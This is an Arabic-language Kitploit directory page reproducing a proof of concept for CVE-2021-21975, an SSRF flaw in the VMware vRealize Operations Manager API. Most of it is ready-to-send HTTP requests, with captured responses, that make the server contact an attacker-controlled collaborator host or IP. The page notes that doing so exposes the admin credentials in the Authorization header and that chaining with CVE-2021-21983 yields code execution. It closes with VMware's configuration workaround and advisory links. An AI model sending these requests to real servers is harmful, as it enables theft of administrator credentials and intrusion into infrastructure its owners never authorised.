Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-21975 — [CVE-2021-21975] VMware vRealize Operations Manager API تزوير طلب من جانب الخادم (SSRF) | Kitploit
أدوات/GitHubGitHub/murataydemir/cve-2021-21975
الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبأمن السحابة
GitHubmurataydemir/cve-2021-21975

CVE-2021-21975

[CVE-2021-21975] VMware vRealize Operations Manager API تزوير طلب من جانب الخادم (SSRF)

عرض المستودع
432منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[CVE-2021-21975] تزوير طلب من جانب الخادم (SSRF) في واجهة برمجة تطبيقات VMware vRealize Operations Manager


vRealize Operations (vROps) هي أداة تدير عمليات تكنولوجيا المعلومات ذاتية القيادة مدعومة بالذكاء الاصطناعي من التطبيقات إلى البنية التحتية لتحسين وتخطيط وتوسيع نطاق عمليات نشر VMware Cloud و HCI مع توحيد مراقبة السحابة العامة. واجهة برمجة تطبيقات VMware vRealize Operations Manager 8.4 وجميع الإصدارات السابقة معرضة لثغرة تزوير الطلب من جانب الخادم (SSRF). قد يؤدي استغلال هذه الثغرة بنجاح إلى قراءة أو تحديث الموارد الداخلية، وفي هذه الحالة أيضًا، يمكن للمهاجم سرقة بيانات اعتماد المسؤول لخادم vROps بسهولة. من خلال الجمع بين CVE-2021-21975 و CVE-2021-21983، يمكن للمهاجم تشغيل تعليمات برمجية عشوائية على خادم vRealize Operations البعيد.

إثبات المفهوم (PoC): لاستغلال هذه الثغرة، يمكنك استخدام الطلب التالي

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]

الرد على الطلب أعلاه كما يلي

root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]
لقطة شاشة 2021-04-03 الساعة 01 03 29 لقطة شاشة 2021-04-03 الساعة 01 18 07

كما يتم كشف بيانات اعتماد المسؤول في رأس Authorization.

لقطة شاشة 2021-04-03 الساعة 01 19 39 لقطة شاشة 2021-04-03 الساعة 01 24 34

إثباتات مفهوم أخرى (PoCs): أو يمكنك استخدام الطلبات التالية للكشف عن ثغرة CVE-2021-21975 تزوير الطلب من جانب الخادم (SSRF) في واجهة برمجة تطبيقات VMware vRealize Operations Manager

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]
لقطة شاشة 2021-04-03 الساعة 00 00 20
root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]
لقطة شاشة 2021-04-03 الساعة 00 01 00

حل بديل: إذا تعذر تثبيت التصحيح، أو لم يكن هناك تصحيح لإصدارك من vRealize Operations، يمكن اتخاذ الخطوات التالية كحل بديل للمشكلة. لا يوجد تأثير على vRealize Operations عند تطبيق هذا الحل البديل.

للتحايل على هذه المشكلة في vRealize Operations، قم بإزالة سطر تكوين من casa-security-context.xml

  1. سجّل الدخول إلى العقدة الأساسية كمستخدم root عبر SSH أو وحدة التحكم، مع الضغط على ALT+F1 في وحدة التحكم لتسجيل الدخول
  2. افتح /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml
  3. ابحث عن السطر التالي وقم بإزالته: <sec:http pattern="/nodes/thumbprints" security='none'/>
  4. احفظ الملف وأغلقه
  5. أعد تشغيل خدمة CaSA باستخدام هذا الأمر: service vmware-casa restart
  6. كرّر الخطوات من 1 إلى 5 على جميع العقد الأخرى في مجموعة vRealize Operations.

لمزيد من المعلومات، تفضل بزيارة الصفحات التالية.

https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html

تنزيل الأداة